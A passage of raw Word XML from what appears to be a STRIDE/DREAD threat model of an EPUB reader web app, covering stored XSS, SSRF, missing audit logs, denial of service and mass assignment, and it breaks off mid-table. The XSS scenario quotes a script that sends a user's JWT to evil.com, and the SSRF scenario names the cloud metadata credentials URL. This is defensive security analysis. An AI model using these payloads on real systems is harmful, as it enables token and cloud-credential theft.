                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Trivial. Requires only reading the source code and using an online JWT encoder.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="061FA6E4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4.2 T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tampering: Malicious EPUB Upload (Stored XSS)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D09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94E7EC">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7A8DC2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5C695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8CCFEB">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07BFEF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.9 High (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="280A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299CD3">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2E2106">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/admin/books/upload, Reader.tsx (epub.js renderer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3355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00764E">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571CB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>An admin (or attacker with admin access via T-01) uploads a crafted EPUB containing &lt;script&gt;fetch('https://evil.com?t='+localStorage.getItem('token'))&lt;/script&gt; in a chapter HTML file. Multer accepts it (MIME check passes). When any reader opens the book, epub.js renders it with allowScriptedContent: true, executing the script and exfiltrating the JWT to the attacker's server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6842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59660">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitability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FCF16">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Moderate. Requires admin access (chainable from T-01) and a user to open the book.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70137ED8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4.3 R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Repudiation: No Audit Trail for Admin Actions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609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FCC59E">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AF6B60">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5D50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17115">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BBD73D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.3 Medium (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4114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CE1525">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BD2DE3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>All /api/admin/* routes, MongoDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3F1D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80AF40">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FBBCDB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>An administrator (or attacker using a compromised admin account) deletes books, modifies metadata, or scrapes content. No server-side audit log records which admin performed the action, from which IP, or at what time. Forensic investigation after a breach cannot distinguish legitimate from malicious operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F2EE7BF">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4.4 I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Information Disclosure: SSRF via EPUB Proxy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4EA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0DE549">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9565B1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="453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8699F2">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138468">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.1 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2D11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80477B">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6251E0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/books/epub-proxy/:id, books collection (epubUrl field)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52DC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409E7A">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6968D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>If deployed on AWS/GCP/Azure, an attacker who can write to the books collection (via compromised admin or NoSQL injection) sets a book's epubUrl to http://169.254.169.254/latest/meta-data/iam/security-credentials/. When any client requests GET /api/books/epub-proxy/:id, the Express server fetches that URL and streams cloud IAM credentials directly to the attacker.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="753D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CFCF30">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitability</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0D56D7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Moderate. Requires write access to books collection (chainable from T-01 + admin routes).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="024C2C6C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4.5 D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Denial of Service: Large EPUB CPU Exhaustion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6F4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0E66A9">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4B6177">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7A22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8D0DA1">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036718">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.5 Medium (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4F07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AB968">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F320E3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/books/epub-proxy/:id, epub.js locations.generate()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2D7B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05D8AE">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D0C68B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>An oversized EPUB (10,000 chapters, 200MB+) is uploaded. EPUB proxy streams it without caching. Combined with no rate limiting, multiple concurrent requests exhaust server bandwidth and client-side locations.generate() blocks the browser tab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47900E9C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4.6 E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Elevation of Privilege: Mass Assignment on Update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14D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BCEC63">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Threat ID</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107C65">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3EBB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F6C4E7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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2AA8A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5 High (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="76BB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88028A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected Component</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74FCC9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUT /api/admin/books/:id, PUT /api/profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2A37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81F34">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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37DCDB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUT /api/admin/books/:id passes req.body directly to Book.findByIdAndUpdate() with no field allowlist. The same pattern in PUT /api/profile for user updates means a future developer adding 'role' to the destructured body enables {"role": "admin"} privilege escalation. The codebase pattern establishes a trust in raw req.body that is dangerous.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E8A6648">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41371C0F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>5. DREAD Risk Scoring Matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346171CA">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each threat is scored on the DREAD model (Damage, Reproducibility, Exploitability, Affected Users, Discoverability) on a scale of 1–10.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300"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1160"/>
      </w:tblGrid>
      <w:tr w14:paraId="3B6C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61A29D5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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3D19D7B0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Threat</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4F577266">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>D</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3B1EC7EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>R</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EC1E79E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>E</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4507B30A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A</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6C247CD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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104BFFB2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3226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3FC68">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-01</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4CA319">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JWT secret hardcoded</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7BCB3C">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EA66C">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411D19">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82FEA5">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2DE912">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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260DF7DF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="77FB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620C77">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-02</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0C52BC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored XSS via EPUB</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F6650">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9</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364BCB">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50C104">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73826B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9</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E9675C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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69239DC1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="30A0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EA3E58">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-03</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E3E09">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSRF via EPUB proxy</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CD5F37">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C8F85">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D8A2F">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C001B">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F8DB3B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>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69DF374F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2116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5E0CBC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-04</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40EA33">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NoSQL injection login</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65C56">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7A5367">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A4B6FE">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1E70B7">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0948F5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>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61D61C4B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4ED6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47B2D1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-05</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CC9C05">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mass assignment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33D2E5">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DB941A">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8CA76B">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5FC150">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F76253">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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A902C91">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3BBD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3238DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-06</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1BFD67">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
